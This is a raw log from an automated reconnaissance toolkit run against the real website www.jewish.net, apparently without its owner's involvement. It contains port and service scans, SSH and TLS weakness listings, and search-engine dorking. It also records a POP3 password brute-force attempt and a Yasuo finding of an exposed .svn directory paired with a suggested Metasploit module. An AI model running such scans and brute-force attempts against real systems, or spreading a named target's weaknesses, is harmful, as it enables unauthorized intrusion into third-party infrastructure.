  ____ _____ ___  ______ _/ /_____  ____  ___
 / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
/ /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
\__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
        /_/  scan v0.5.0 - by @michenriksen

Loaded 3 hosts from /root/aquatone/www.jewish.net/hosts.json

Probing 4 ports...
80/tcp    209.140.28.114  update.jewish.net
80/tcp    69.73.184.159   jewish.net, www.jewish.net
443/tcp   69.73.184.159   jewish.net, www.jewish.net

Wrote open ports to file:///root/aquatone/www.jewish.net/open_ports.txt
Wrote URLs to file:///root/aquatone/www.jewish.net/urls.txt
                           __
  ____ _____ ___  ______ _/ /_____  ____  ___
 / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
/ /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
\__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
        /_/  gather v0.5.0 - by @michenriksen

Processing 5 pages...

Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-12 19:30 EST
Nmap scan report for www.jewish.net (69.73.184.159)
Host is up (0.22s latency).
Not shown: 429 filtered ports, 35 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
110/tcp  open  pop3
143/tcp  open  imap
443/tcp  open  https
465/tcp  open  smtps
587/tcp  open  submission
993/tcp  open  imaps
995/tcp  open  pop3s
3306/tcp open  mysql
5666/tcp open  nrpe
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-12 19:31 EST
Nmap scan report for www.jewish.net (69.73.184.159)
Host is up (0.13s latency).
Not shown: 2 filtered ports, 1 closed port
PORT     STATE         SERVICE
67/udp   open|filtered dhcps
68/udp   open|filtered dhcpc
69/udp   open|filtered tftp
88/udp   open|filtered kerberos-sec
123/udp  open|filtered ntp
139/udp  open|filtered netbios-ssn
161/udp  open|filtered snmp
162/udp  open|filtered snmptrap
389/udp  open|filtered ldap
520/udp  open|filtered route
2049/udp open|filtered nfs
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-12 19:31 EST
Nmap scan report for www.jewish.net (69.73.184.159)
Host is up (0.21s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Pure-FTPd
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc|firewall|webcam
Running (JUST GUESSING): Linux 4.X|3.X|2.6.X (92%), Synology DiskStation Manager 5.X (87%), WatchGuard Fireware 11.X (87%), Tandberg embedded (85%), FreeBSD 6.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:4.4 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/o:watchguard:fireware:11.8 cpe:/h:tandberg:vcs cpe:/o:freebsd:freebsd:6.2
Aggressive OS guesses: Linux 4.4 (92%), Linux 3.10 - 3.12 (91%), Linux 2.6.18 - 2.6.22 (90%), Linux 4.9 (90%), Linux 4.0 (88%), Linux 2.6.18 (87%), Linux 3.10 - 3.16 (87%), Linux 3.10 - 4.11 (87%), Linux 3.11 - 4.1 (87%), Linux 3.18 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 11 hops

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   122.10 ms 10.244.200.1
2   122.12 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
3   122.14 ms 185.206.226.11
4   122.88 ms 80.231.153.49
5   ...
6   221.37 ms 4.69.150.161
7   213.54 ms ZAYO-BANDWI.edge1.Atlanta4.Level3.net (4.53.236.134)
8   213.96 ms 205.214.72.82
9   216.17 ms 209.51.149.106
10  215.19 ms 63.247.66.122
11  214.44 ms finn.nocdirect.com (69.73.184.159)
#######################################################################################################################################
# general
(gen) banner: SSH-2.0-OpenSSH_7.4
(gen) software: OpenSSH 7.4
(gen) compatibility: OpenSSH 7.3+ (some functionality from 6.6), Dropbear SSH 2016.73+ (some functionality from 0.52)
(gen) compression: enabled (zlib@openssh.com)

# key exchange algorithms
(kex) curve25519-sha256                     -- [warn] unknown algorithm
(kex) curve25519-sha256@libssh.org          -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp256                    -- [fail] using weak elliptic curves
                                            `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp384                    -- [fail] using weak elliptic curves
                                            `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp521                    -- [fail] using weak elliptic curves
                                            `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) diffie-hellman-group-exchange-sha256  -- [warn] using custom size modulus (possibly weak)
                                            `- [info] available since OpenSSH 4.4
(kex) diffie-hellman-group16-sha512         -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
(kex) diffie-hellman-group18-sha512         -- [info] available since OpenSSH 7.3
(kex) diffie-hellman-group-exchange-sha1    -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] using weak hashing algorithm
                                            `- [info] available since OpenSSH 2.3.0
(kex) diffie-hellman-group14-sha256         -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
(kex) diffie-hellman-group14-sha1           -- [warn] using weak hashing algorithm
                                            `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
(kex) diffie-hellman-group1-sha1            -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
                                            `- [warn] using small 1024-bit modulus
                                            `- [warn] using weak hashing algorithm
                                            `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28

# host-key algorithms
(key) ssh-rsa                               -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
(key) rsa-sha2-512                          -- [info] available since OpenSSH 7.2
(key) rsa-sha2-256                          -- [info] available since OpenSSH 7.2
(key) ecdsa-sha2-nistp256                   -- [fail] using weak elliptic curves
                                            `- [warn] using weak random number generator could reveal the key
                                            `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(key) ssh-ed25519                           -- [info] available since OpenSSH 6.5

# encryption algorithms (ciphers)
(enc) chacha20-poly1305@openssh.com         -- [info] available since OpenSSH 6.5
                                            `- [info] default cipher since OpenSSH 6.9.
(enc) aes128-ctr                            -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
(enc) aes192-ctr                            -- [info] available since OpenSSH 3.7
(enc) aes256-ctr                            -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
(enc) aes128-gcm@openssh.com                -- [info] available since OpenSSH 6.2
(enc) aes256-gcm@openssh.com                -- [info] available since OpenSSH 6.2
(enc) aes128-cbc                            -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] using weak cipher mode
                                            `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
(enc) aes192-cbc                            -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] using weak cipher mode
                                            `- [info] available since OpenSSH 2.3.0
(enc) aes256-cbc                            -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] using weak cipher mode
                                            `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
(enc) blowfish-cbc                          -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [fail] disabled since Dropbear SSH 0.53
                                            `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
                                            `- [warn] using weak cipher mode
                                            `- [warn] using small 64-bit block size
                                            `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
(enc) cast128-cbc                           -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
                                            `- [warn] using weak cipher mode
                                            `- [warn] using small 64-bit block size
                                            `- [info] available since OpenSSH 2.1.0
(enc) 3des-cbc                              -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] using weak cipher
                                            `- [warn] using weak cipher mode
                                            `- [warn] using small 64-bit block size
                                            `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28

# message authentication code algorithms
(mac) umac-64-etm@openssh.com               -- [warn] using small 64-bit tag size
                                            `- [info] available since OpenSSH 6.2
(mac) umac-128-etm@openssh.com              -- [info] available since OpenSSH 6.2
(mac) hmac-sha2-256-etm@openssh.com         -- [info] available since OpenSSH 6.2
(mac) hmac-sha2-512-etm@openssh.com         -- [info] available since OpenSSH 6.2
(mac) hmac-sha1-etm@openssh.com             -- [warn] using weak hashing algorithm
                                            `- [info] available since OpenSSH 6.2
(mac) umac-64@openssh.com                   -- [warn] using encrypt-and-MAC mode
                                            `- [warn] using small 64-bit tag size
                                            `- [info] available since OpenSSH 4.7
(mac) umac-128@openssh.com                  -- [warn] using encrypt-and-MAC mode
                                            `- [info] available since OpenSSH 6.2
(mac) hmac-sha2-256                         -- [warn] using encrypt-and-MAC mode
                                            `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-sha2-512                         -- [warn] using encrypt-and-MAC mode
                                            `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-sha1                             -- [warn] using encrypt-and-MAC mode
                                            `- [warn] using weak hashing algorithm
                                            `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28

# algorithm recommendations (for OpenSSH 7.4)
(rec) -diffie-hellman-group14-sha1          -- kex algorithm to remove
(rec) -ecdh-sha2-nistp256                   -- kex algorithm to remove
(rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove
(rec) -diffie-hellman-group1-sha1           -- kex algorithm to remove
(rec) -diffie-hellman-group-exchange-sha1   -- kex algorithm to remove
(rec) -ecdh-sha2-nistp521                   -- kex algorithm to remove
(rec) -ecdh-sha2-nistp384                   -- kex algorithm to remove
(rec) -ecdsa-sha2-nistp256                  -- key algorithm to remove
(rec) -blowfish-cbc                         -- enc algorithm to remove
(rec) -3des-cbc                             -- enc algorithm to remove
(rec) -aes256-cbc                           -- enc algorithm to remove
(rec) -cast128-cbc                          -- enc algorithm to remove
(rec) -aes192-cbc                           -- enc algorithm to remove
(rec) -aes128-cbc                           -- enc algorithm to remove
(rec) -hmac-sha2-512                        -- mac algorithm to remove
(rec) -umac-128@openssh.com                 -- mac algorithm to remove
(rec) -hmac-sha2-256                        -- mac algorithm to remove
(rec) -umac-64@openssh.com                  -- mac algorithm to remove
(rec) -hmac-sha1                            -- mac algorithm to remove
(rec) -hmac-sha1-etm@openssh.com            -- mac algorithm to remove
(rec) -umac-64-etm@openssh.com              -- mac algorithm to remove
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-12 19:46 EST
Nmap scan report for www.jewish.net (69.73.184.159)
Host is up (0.22s latency).

PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
Too many fingerprints match this host to give specific OS details
Network Distance: 11 hops

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   126.43 ms 10.244.200.1
2   135.41 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
3   126.47 ms 185.206.226.11
4   126.98 ms 80.231.153.49
5   ...
6   220.46 ms 4.69.150.161
7   219.08 ms ZAYO-BANDWI.edge1.Atlanta4.Level3.net (4.53.236.134)
8   219.48 ms 205.214.72.82
9   221.73 ms 209.51.149.106
10  219.97 ms 63.247.66.122
11  217.90 ms finn.nocdirect.com (69.73.184.159)
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-12 19:48 EST
Nmap scan report for www.jewish.net (69.73.184.159)
Host is up (0.21s latency).

PORT   STATE         SERVICE VERSION
67/udp open|filtered dhcps
|_dhcp-discover: ERROR: Script execution failed (use -d to debug)
Too many fingerprints match this host to give specific OS details
Network Distance: 11 hops

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   122.70 ms 10.244.200.1
2   159.86 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
3   122.73 ms 185.206.226.11
4   123.23 ms 80.231.153.49
5   ...
6   216.32 ms 4.69.150.161
7   214.69 ms ZAYO-BANDWI.edge1.Atlanta4.Level3.net (4.53.236.134)
8   215.18 ms 205.214.72.82
9   217.52 ms 209.51.149.106
10  215.99 ms 63.247.66.122
11  212.59 ms finn.nocdirect.com (69.73.184.159)
######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-12 19:50 EST
Nmap scan report for www.jewish.net (69.73.184.159)
Host is up (0.22s latency).

PORT   STATE         SERVICE VERSION
68/udp open|filtered dhcpc
Too many fingerprints match this host to give specific OS details
Network Distance: 11 hops

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   128.88 ms 10.244.200.1
2   176.19 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
3   129.09 ms 185.206.226.11
4   129.49 ms 80.231.153.49
5   ...
6   223.27 ms 4.69.150.161
7   221.51 ms ZAYO-BANDWI.edge1.Atlanta4.Level3.net (4.53.236.134)
8   221.56 ms 205.214.72.82
9   223.68 ms 209.51.149.106
10  222.49 ms 63.247.66.122
11  215.04 ms finn.nocdirect.com (69.73.184.159)
######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-12 19:52 EST
Nmap scan report for www.jewish.net (69.73.184.159)
Host is up (0.21s latency).

PORT   STATE         SERVICE VERSION
69/udp open|filtered tftp
Too many fingerprints match this host to give specific OS details
Network Distance: 11 hops

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   122.03 ms 10.244.200.1
2   152.25 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
3   122.07 ms 185.206.226.11
4   122.41 ms 80.231.153.49
5   ...
6   215.49 ms 4.69.150.161
7   214.24 ms ZAYO-BANDWI.edge1.Atlanta4.Level3.net (4.53.236.134)
8   214.67 ms 205.214.72.82
9   216.90 ms 209.51.149.106
10  215.49 ms 63.247.66.122
11  213.94 ms finn.nocdirect.com (69.73.184.159)
######################################################################################################################################
                                 ^     ^
        _   __  _   ____ _   __  _    _   ____
       ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
      | V V // o // _/ | V V // 0 // 0 // _/
      |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
                                <
                                ...'

    WAFW00F - Web Application Firewall Detection Tool

    By Sandro Gauci && Wendel G. Henrique

Checking http://www.jewish.net
The site http://www.jewish.net is behind a ModSecurity (OWASP CRS)
Number of requests: 11
#######################################################################################################################################

wig - WebApp Information Gatherer


Scanning http://www.jewish.net...
__________________ SITE INFO __________________
IP               Title
69.73.184.159    Jewish and Israeli Web Direc

___________________ VERSION ___________________
Name             Versions   Type

_______________________________________________
Time: 226.3 sec  Urls: 612  Fingerprints: 40401
######################################################################################################################################
------------------------------------------------------------------------------------------------------------------------------------

[ ! ] Starting SCANNER INURLBR 2.1 at [12-11-2018 20:01:45]
[ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program

[ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-www.jewish.net.txt  ]
[ INFO ][ DORK ]::[ site:www.jewish.net ]
[ INFO ][ SEARCHING ]:: {
[ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.my ]

[ INFO ][ SEARCHING ]::
-[:::]
[ INFO ][ ENGINE ]::[ GOOGLE API ]

[ INFO ][ SEARCHING ]::
-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
[ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.fm ID: 007843865286850066037:b0heuatvay8 ]

[ INFO ][ SEARCHING ]::
-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]

[ INFO ][ TOTAL FOUND VALUES ]:: [ 0 ]
[ INFO ] Not a satisfactory result was found!


[ INFO ] [ Shutting down ]
[ INFO ] [ End of process INURLBR at [12-11-2018 20:01:53]
[ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
[ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-www.jewish.net.txt  ]
|_________________________________________________________________________________________

\_________________________________________________________________________________________/
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-12 20:01 EST
Nmap scan report for www.jewish.net (69.73.184.159)
Host is up (0.15s latency).

PORT    STATE SERVICE VERSION
110/tcp open  pop3    Dovecot pop3d
| pop3-brute:
|   Accounts: No valid accounts found
|   Statistics: Performed 55 guesses in 41 seconds, average tps: 1.3
|_  ERROR: Failed to connect.
|_pop3-capabilities: AUTH-RESP-CODE TOP USER STLS SASL(PLAIN LOGIN) RESP-CODES PIPELINING UIDL CAPA
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc|firewall
Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (92%), Synology DiskStation Manager 5.X (86%), WatchGuard Fireware 11.X (86%), FreeBSD 6.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4.4 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/o:watchguard:fireware:11.8 cpe:/o:freebsd:freebsd:6.2
Aggressive OS guesses: Linux 3.10 - 3.12 (92%), Linux 4.4 (92%), Linux 4.9 (91%), Linux 2.6.18 - 2.6.22 (90%), Linux 3.10 (87%), Linux 4.0 (87%), Linux 2.6.18 (86%), Linux 3.10 - 4.11 (86%), Linux 3.11 - 4.1 (86%), Linux 3.2 - 4.9 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   126.40 ms 69.73.184.159

######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-12 20:03 EST
Nmap scan report for www.jewish.net (69.73.184.159)
Host is up (0.21s latency).

PORT    STATE         SERVICE VERSION
123/udp open|filtered ntp
Too many fingerprints match this host to give specific OS details
Network Distance: 11 hops

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   123.82 ms 10.244.200.1
2   124.07 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
3   123.87 ms 185.206.226.11
4   124.53 ms 80.231.153.49
5   124.75 ms 80.231.153.66
6   217.57 ms 4.69.150.161
7   216.18 ms ZAYO-BANDWI.edge1.Atlanta4.Level3.net (4.53.236.134)
8   216.30 ms 205.214.72.82
9   218.80 ms l3-atl-v1-p40.netdepot.com (209.51.149.106)
10  222.47 ms 63.247.66.122
11  212.08 ms 69.73.184.159
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-12 20:05 EST
Nmap scan report for www.jewish.net (69.73.184.159)
Host is up (0.18s latency).

PORT    STATE         SERVICE VERSION
161/tcp filtered      snmp
161/udp open|filtered snmp
Too many fingerprints match this host to give specific OS details
Network Distance: 11 hops

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   121.34 ms 10.244.200.1
2   124.13 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
3   121.39 ms 185.206.226.11
4   121.92 ms 80.231.153.49
5   122.35 ms 80.231.153.66
6   214.85 ms 4.69.150.161
7   213.71 ms ZAYO-BANDWI.edge1.Atlanta4.Level3.net (4.53.236.134)
8   214.04 ms 205.214.72.82
9   216.21 ms l3-atl-v1-p40.netdepot.com (209.51.149.106)
10  215.28 ms 63.247.66.122
11  216.12 ms 69.73.184.159
#######################################################################################################################################
                                 ^     ^
        _   __  _   ____ _   __  _    _   ____
       ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
      | V V // o // _/ | V V // 0 // 0 // _/
      |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
                                <
                                ...'

    WAFW00F - Web Application Firewall Detection Tool

    By Sandro Gauci && Wendel G. Henrique

Checking https://www.jewish.net
The site https://www.jewish.net is behind a ModSecurity (OWASP CRS)
Number of requests: 11
#######################################################################################################################################


 AVAILABLE PLUGINS
 -----------------

  PluginCompression
  PluginOpenSSLCipherSuites
  PluginSessionResumption
  PluginHSTS
  PluginChromeSha1Deprecation
  PluginCertInfo
  PluginHeartbleed
  PluginSessionRenegotiation


 CHECKING HOST(S) AVAILABILITY
 -----------------------------

   www.jewish.net:443                  => 69.73.184.159:443


 SCAN RESULTS FOR WWW.JEWISH.NET:443 - 69.73.184.159:443
 -------------------------------------------------------

  * Deflate Compression:
      OK - Compression disabled

  * Session Renegotiation:
      Client-initiated Renegotiations:   OK - Rejected
      Secure Renegotiation:              OK - Supported

  * Certificate - Content:
      SHA1 Fingerprint:                  91d95c273ced329d0274e11eec58dc9ada560c21
      Common Name:                       jewish.net
      Issuer:                            cPanel, Inc. Certification Authority
      Serial Number:                     E6FED669853BBC45AB4654AB331C5B46
      Not Before:                        Dec 29 00:00:00 2017 GMT
      Not After:                         Mar 29 23:59:59 2018 GMT
      Signature Algorithm:               sha256WithRSAEncryption
      Public Key Algorithm:              rsaEncryption
      Key Size:                          2048 bit
      Exponent:                          65537 (0x10001)
      X509v3 Subject Alternative Name:   {'DNS': ['jewish.net', 'www.jewish.net']}

  * Certificate - Trust:
      Hostname Validation:               OK - Subject Alternative Name matches
      Google CA Store (09/2015):         FAILED - Certificate is NOT Trusted: certificate has expired
      Java 6 CA Store (Update 65):       FAILED - Certificate is NOT Trusted: certificate has expired
      Microsoft CA Store (09/2015):      FAILED - Certificate is NOT Trusted: certificate has expired
      Apple CA Store (OS X 10.10.5):     FAILED - Certificate is NOT Trusted: certificate has expired
      Mozilla NSS CA Store (09/2015):    FAILED - Certificate is NOT Trusted: certificate has expired
      Certificate Chain Received:        ['jewish.net', 'cPanel, Inc. Certification Authority', 'COMODO RSA Certification Authority']

  * Certificate - OCSP Stapling:
      NOT SUPPORTED - Server did not send back an OCSP response.

  * Session Resumption:
      With Session IDs:                  OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
      With TLS Session Tickets:          OK - Supported

  * SSLV2 Cipher Suites:
      Server rejected all cipher suites.

  * SSLV3 Cipher Suites:
      Server rejected all cipher suites.


 SCAN COMPLETED IN 4.30 S
 ------------------------
Version: 1.11.12-static
OpenSSL 1.0.2-chacha (1.0.2g-dev)

Connected to 69.73.184.159

Testing SSL server www.jewish.net on port 443 using SNI name www.jewish.net

  TLS Fallback SCSV:
Server supports TLS Fallback SCSV

  TLS renegotiation:
Secure session renegotiation supported

  TLS Compression:
Compression disabled

  Heartbleed:
TLS 1.2 not vulnerable to heartbleed
TLS 1.1 not vulnerable to heartbleed
TLS 1.0 not vulnerable to heartbleed

  Supported Server Cipher(s):
Preferred TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA384       Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-GCM-SHA384     DHE 2048 bits
Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-SHA256         DHE 2048 bits
Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits
Accepted  TLSv1.2  256 bits  AES256-GCM-SHA384
Accepted  TLSv1.2  256 bits  AES256-SHA256
Accepted  TLSv1.2  256 bits  AES256-SHA
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-GCM-SHA256   Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA256       Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-GCM-SHA256     DHE 2048 bits
Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-SHA256         DHE 2048 bits
Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-SHA            DHE 2048 bits
Accepted  TLSv1.2  128 bits  AES128-GCM-SHA256
Accepted  TLSv1.2  128 bits  AES128-SHA256
Accepted  TLSv1.2  128 bits  AES128-SHA
Accepted  TLSv1.2  112 bits  ECDHE-RSA-DES-CBC3-SHA        Curve P-256 DHE 256
Accepted  TLSv1.2  112 bits  EDH-RSA-DES-CBC3-SHA          DHE 2048 bits
Accepted  TLSv1.2  112 bits  DES-CBC3-SHA
Preferred TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.1  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits
Accepted  TLSv1.1  256 bits  AES256-SHA
Accepted  TLSv1.1  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.1  128 bits  DHE-RSA-AES128-SHA            DHE 2048 bits
Accepted  TLSv1.1  128 bits  AES128-SHA
Accepted  TLSv1.1  112 bits  ECDHE-RSA-DES-CBC3-SHA        Curve P-256 DHE 256
Accepted  TLSv1.1  112 bits  EDH-RSA-DES-CBC3-SHA          DHE 2048 bits
Accepted  TLSv1.1  112 bits  DES-CBC3-SHA
Preferred TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.0  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits
Accepted  TLSv1.0  256 bits  AES256-SHA
Accepted  TLSv1.0  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.0  128 bits  DHE-RSA-AES128-SHA            DHE 2048 bits
Accepted  TLSv1.0  128 bits  AES128-SHA
Accepted  TLSv1.0  112 bits  ECDHE-RSA-DES-CBC3-SHA        Curve P-256 DHE 256
Accepted  TLSv1.0  112 bits  EDH-RSA-DES-CBC3-SHA          DHE 2048 bits
Accepted  TLSv1.0  112 bits  DES-CBC3-SHA

  SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
RSA Key Strength:    2048

Subject:  jewish.net
Altnames: DNS:jewish.net, DNS:www.jewish.net
Issuer:   cPanel, Inc. Certification Authority

Not valid before: Dec 29 00:00:00 2017 GMT
Not valid after:  Mar 29 23:59:59 2018 GMT

######################################################################################################################################

I, [2018-11-12T20:10:42.838163 #8470]  INFO -- : Initiating port scan
I, [2018-11-12T20:11:45.003293 #8470]  INFO -- : Using nmap scan output file logs/nmap_output_2018-11-12_20-10-42.xml
I, [2018-11-12T20:11:45.004401 #8470]  INFO -- : Discovered open port: 69.73.184.159:80
I, [2018-11-12T20:11:45.957118 #8470]  INFO -- : Discovered open port: 69.73.184.159:443
I, [2018-11-12T20:11:47.715959 #8470]  INFO -- : Discovered open port: 69.73.184.159:465
I, [2018-11-12T20:11:49.065628 #8470]  INFO -- : Discovered open port: 69.73.184.159:993
I, [2018-11-12T20:11:51.247012 #8470]  INFO -- : Discovered tcpwrapped port: 69.73.184.159:5666
I, [2018-11-12T20:11:52.106733 #8470]  INFO -- : Discovered tcpwrapped port: 69.73.184.159:5666
I, [2018-11-12T20:11:53.833537 #8470]  INFO -- : <<<Enumerating vulnerable applications>>>


--------------------------------------------------------
<<<Yasuo discovered following vulnerable applications>>>
--------------------------------------------------------
+----------+---------------------------------+----------------------------------------------+----------+----------+
| App Name |       URL to Application        |              Potential Exploit               | Username | Password |
+----------+---------------------------------+----------------------------------------------+----------+----------+
| SVN      | https://69.73.184.159:443/.svn/ | ./auxiliary/scanner/http/svn_wcdb_scanner.rb |          |          |
+----------+---------------------------------+----------------------------------------------+----------+----------+
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-12 20:14 EST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 20:14
Completed Parallel DNS resolution of 1 host. at 20:14, 16.50s elapsed
Initiating SYN Stealth Scan at 20:14
Scanning www.jewish.net (69.73.184.159) [474 ports]
Discovered open port 110/tcp on 69.73.184.159
Discovered open port 443/tcp on 69.73.184.159
Discovered open port 21/tcp on 69.73.184.159
Discovered open port 80/tcp on 69.73.184.159
Discovered open port 995/tcp on 69.73.184.159
Discovered open port 3306/tcp on 69.73.184.159
Discovered open port 143/tcp on 69.73.184.159
Discovered open port 587/tcp on 69.73.184.159
Discovered open port 993/tcp on 69.73.184.159
Discovered open port 465/tcp on 69.73.184.159
Discovered open port 5666/tcp on 69.73.184.159
Completed SYN Stealth Scan at 20:14, 5.07s elapsed (474 total ports)
Initiating Service scan at 20:14
Scanning 11 services on www.jewish.net (69.73.184.159)
Completed Service scan at 20:15, 34.05s elapsed (11 services on 1 host)
Initiating OS detection (try #1) against www.jewish.net (69.73.184.159)
Retrying OS detection (try #2) against www.jewish.net (69.73.184.159)
Initiating Traceroute at 20:15
Completed Traceroute at 20:15, 0.13s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 20:15
Completed Parallel DNS resolution of 2 hosts. at 20:15, 16.50s elapsed
NSE: Script scanning 69.73.184.159.
Initiating NSE at 20:15
Completed NSE at 20:19, 199.27s elapsed
Initiating NSE at 20:19
